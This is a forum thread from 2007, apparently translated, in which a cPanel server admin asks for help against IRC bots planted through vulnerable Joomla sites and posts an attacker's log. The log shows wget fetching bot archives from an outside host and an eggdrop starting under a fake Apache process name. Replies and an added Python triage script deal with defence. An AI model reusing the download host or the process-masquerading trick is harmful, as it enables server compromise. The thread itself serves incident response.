The Community Forums

Interact with an entire community of cPanel & WHM users!

IRC attacks

Discussion in 'Discusión en Español' started by Piolon, Oct 18, 2007.

  1. Piolon (Well-Known Member)

    Joined: Feb 20, 2007 | Messages: 48 | Likes Received: 0 | Trophy Points: 6

    I am receiving attacks on the server, and I see that the common denominator is bots controlled via IRC. They get them in through vulnerabilities in Joomla or other systems of that kind, and then take control of the server...

    Apart from asking all my users to check the security of their applications.. does anyone know how to defend against these attacks, or how to block the IRC connections??

    Here I attach a log so you can see how it uploads the files and which file it is... you can even download it for analysis....

    Thanks in advance for any kind of help....

    *********************************************************************

    --12:18:30-- http://antariksa.rcucoremapsul-sel.com/arjuna.tar.gz
    => `arjuna.tar.gz'
    Risoluzione di antariksa.rcucoremapsul-sel.com in corso... 74.52.137.130
    Connessione a antariksa.rcucoremapsul-sel.com|74.52.137.130:80... connesso.
    HTTP richiesta inviata, aspetto la risposta... 200 OK
    Lunghezza: 1,858,628 (1.8M) [application/x-tar]


    12:18:45 (130.03 KB/s) - "arjuna.tar.gz" salvato [1858628/1858628]

    --12:20:51-- http://antariksa.rcucoremapsul-sel.com/indoirc.tcl
    => `indoirc.tcl'
    Risoluzione di antariksa.rcucoremapsul-sel.com in corso... 74.52.137.130
    Connessione a antariksa.rcucoremapsul-sel.com|74.52.137.130:80... connesso.
    HTTP richiesta inviata, aspetto la risposta... 200 OK
    Lunghezza: 337,046 (329K) [application/x-tcl]


    12:20:55 (96.47 KB/s) - "indoirc.tcl" salvato [337046/337046]

    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14377
    [12:23] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:23] Listening at telnet port 3869 (all)
    [12:23] Module loaded: transfer (with lang support)
    [12:23] Module loaded: channels
    [12:23] Module loaded: server
    [12:23] Module loaded: ctcp
    [12:23] Module loaded: irc
    [12:23] Module loaded: share
    [12:23] Module loaded: filesys (with lang support)
    [12:23] Module loaded: notes (with lang support)
    [12:23] Module loaded: console (with lang support)
    [12:23] Module loaded: blowfish
    [12:23] Module loaded: assoc (with lang support)
    [12:23] Module loaded: wire (with lang support)
    [12:23] Loaded ArjunA.tcl
    [12:23] ArjunA -> War tCl
    [12:23] ======================================
    [12:23] ArjunA TCL Loaded
    [12:23] Contact ArjunA For More Info
    [12:23] ======================================
    [12:23] ping.tcl loaded
    [12:23] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:23] Dns Resolver 3.0 by Arjuna
    [12:23] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:23] Creating channel file
    [12:23] === daengiwan: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14758
    [12:25] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:25] Listening at telnet port 3870 (all)
    [12:25] Module loaded: transfer (with lang support)
    [12:25] Module loaded: channels
    [12:25] Module loaded: server
    [12:25] Module loaded: ctcp
    [12:25] Module loaded: irc
    [12:25] Module loaded: share
    [12:25] Module loaded: filesys (with lang support)
    [12:25] Module loaded: notes (with lang support)
    [12:25] Module loaded: console (with lang support)
    [12:25] Module loaded: blowfish
    [12:25] Module loaded: assoc (with lang support)
    [12:25] Module loaded: wire (with lang support)
    [12:25] Loaded ArjunA.tcl
    [12:25] ArjunA -> War tCl
    [12:25] ======================================
    [12:25] ArjunA TCL Loaded
    [12:25] Contact ArjunA For More Info
    [12:25] ======================================
    [12:25] ping.tcl loaded
    [12:25] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:25] Dns Resolver 3.0 by Arjuna
    [12:25] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:25] Creating channel file
    [12:25] === daengiwan: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 14928
    [12:25] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:25] Listening at telnet port 3870 (all)
    [12:25] Module loaded: transfer (with lang support)
    [12:25] Module loaded: channels
    [12:25] Module loaded: server
    [12:25] Module loaded: ctcp
    [12:25] Module loaded: irc
    [12:25] Module loaded: share
    [12:25] Module loaded: filesys (with lang support)
    [12:25] Module loaded: notes (with lang support)
    [12:25] Module loaded: console (with lang support)
    [12:25] Module loaded: blowfish
    [12:25] Module loaded: assoc (with lang support)
    [12:25] Module loaded: wire (with lang support)
    [12:25] Loaded ArjunA.tcl
    [12:25] ArjunA -> War tCl
    [12:25] ======================================
    [12:25] ArjunA TCL Loaded
    [12:25] Contact ArjunA For More Info
    [12:25] ======================================
    [12:25] ping.tcl loaded
    [12:25] Anti Trout Slap DraGonS.16 By DraGonS Loaded...
    [12:25] Dns Resolver 3.0 by Arjuna
    [12:25] PORTCHECK: PortCheck.tcl Version 2.2 by arjuna is loaded.
    [12:25] Creating channel file
    [12:25] === daeng: 1 channels, 0 users.
    ==> Fakename: /usr/local/apache/bin/httpd PidNum: 15062
    [12:27] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
    [12:27] Listening at telnet port 3871 (all)
    [12:27] Module loaded: transfer (with lang support)
    [12:27] Module loaded: channels
    [12:27] Module loaded: server
    [12:27] Module loaded: ctcp
    [12:27] Module loaded: irc
    [12:27] Module loaded: share
    [12:27] Module loaded: filesys (with lang support)
    [12:27] Module loaded: notes (with lang support)
    [12:27] Module loaded: console (with lang support)
    [12:27] Module loaded: blowfish
    [12:27] Module loaded: assoc (with lang support)
    [12:27] Module loaded: wire (with lang support)
    [12:27] Loaded ArjunA.tcl
    [12:27] ArjunA -> War tCl
     
  2. n1ck (Member)

    Joined: Oct 3, 2007 | Messages: 7 | Likes Received: 0 | Trophy Points: 1

    You should check that no user has SSH access on the cPanel accounts. I would advise you to install mod_security for Apache and block PHP injection attempts such as downloads of those bots and script installations. I would also advise you to edit disable_functions in php.ini so as not to allow exec functions or possible attempts to use a PHP shell.

    If you need help, send me a PM.

    Regards.
     
  3. IPSecureNetwork (Well-Known Member)

    Joined: May 28, 2005 | Messages: 99 | Likes Received: 0 | Trophy Points: 6

    The problem you have does not have much to do with the tcl called arjuna... that is a tcl for an eggdrop, which is a multi-purpose bot (very doubtfully for rootkits or attacks). The problem lies in PHP apps that allow file inclusion: they let a Perl file be left in /tmp, which is then executed by the user running Apache, or by the owner of the compromised website... so you already have several things to look at (strange files in /tmp, or processes camouflaged as Apache processes that are generating heavy CPU usage). The most practical solution is to use some kind of IDS or IPS (better if it is at the firewall).. or another practical solution is to use MOD_SECURITY with all the rules up to date.. to prevent file inclusions..

    As for the attacks on IRC that you have, well... the only thing that prevents those attacks is providers with hardware firewalls in the datacenters.. or a Cisco ASA or Guard dedicated to your machine.. (some ISPs provide those services).

    I hope this helps with your problem..

    Regards.
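Added example (not code from the thread): a small Python triage script that pulls the indicators out of a log like the one posted above (download URLs, the fake process name and PIDs the eggdrop announces, its telnet listening ports) and then applies the check from the reply above, flagging processes whose argv[0] claims to be Apache's httpd while the real executable lives somewhere else. The sample log is constructed from lines of the post; the process listing is a constructed example and the `/tmp/.x/...` path is a placeholder.

```python
import re

# Constructed sample: lines taken from the log posted above, plus one benign module line.
SAMPLE_LOG = """\
--12:18:30-- http://antariksa.rcucoremapsul-sel.com/arjuna.tar.gz
12:18:45 (130.03 KB/s) - "arjuna.tar.gz" salvato [1858628/1858628]
--12:20:51-- http://antariksa.rcucoremapsul-sel.com/indoirc.tcl
==> Fakename: /usr/local/apache/bin/httpd PidNum: 14377
[12:23] --- Loading eggdrop v1.6.10 (Wed Oct 17 2007)
[12:23] Listening at telnet port 3869 (all)
[12:23] Module loaded: blowfish
==> Fakename: /usr/local/apache/bin/httpd PidNum: 14758
[12:25] Listening at telnet port 3870 (all)
"""

DOWNLOAD_RE = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")          # wget fetch line
FAKENAME_RE = re.compile(r"^==> Fakename:\s+(\S+)\s+PidNum:\s+(\d+)")  # eggdrop process-name spoof
LISTEN_RE = re.compile(r"Listening at telnet port (\d+)")
EGGDROP_RE = re.compile(r"Loading eggdrop v([\d.]+)")


def extract_indicators(log_text):
    """Collect the compromise indicators from a wget/eggdrop log as a dict of lists."""
    ind = {"downloads": [], "fake_processes": [], "listen_ports": [], "eggdrop_versions": []}
    for raw in log_text.splitlines():
        line = raw.strip()
        if m := DOWNLOAD_RE.match(line):
            ind["downloads"].append(m.group(1))
        elif m := FAKENAME_RE.match(line):
            ind["fake_processes"].append((m.group(1), int(m.group(2))))
        elif m := LISTEN_RE.search(line):
            ind["listen_ports"].append(int(m.group(1)))
        elif m := EGGDROP_RE.search(line):
            ind["eggdrop_versions"].append(m.group(1))
    return ind


def suspicious_httpd(processes, apache_bin="/usr/local/apache/bin/httpd"):
    """processes: iterable of (pid, user, argv0, real_exe), e.g. built from ps and
    readlink /proc/<pid>/exe. Returns PIDs that claim to be httpd but run another binary."""
    return [pid for pid, _user, argv0, exe in processes
            if argv0 == apache_bin and exe != apache_bin]


if __name__ == "__main__":
    print(extract_indicators(SAMPLE_LOG))
    # Constructed listing: one genuine httpd worker and one eggdrop hiding under the same name.
    listing = [(101, "nobody", "/usr/local/apache/bin/httpd", "/usr/local/apache/bin/httpd"),
               (14377, "nobody", "/usr/local/apache/bin/httpd", "/tmp/.x/arjuna/eggdrop")]
    print(suspicious_httpd(listing))  # prints [14377]
```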
     
  4. Piolon (Well-Known Member)

    Joined: Feb 20, 2007 | Messages: 48 | Likes Received: 0 | Trophy Points: 6

    First of all, many thanks....

    As I was saying.. first of all, many thanks for replying!!!!

    Whenever I come across the eggdrop it is thanks to a site with Joomla installed... Unfortunately I cannot tell everyone not to use it...

    In short.. I have mod_security installed and I think it is updated with the latest rules... I am going to check it...

    Honestly I do not know how they do it, but they keep uploading files... The nobody_check I run periodically helps me detect them, but it is not a great solution either...

    Is there no way to configure the server's (software) firewall to prevent IRC attacks??

    Thanks in advance for your attention...
     
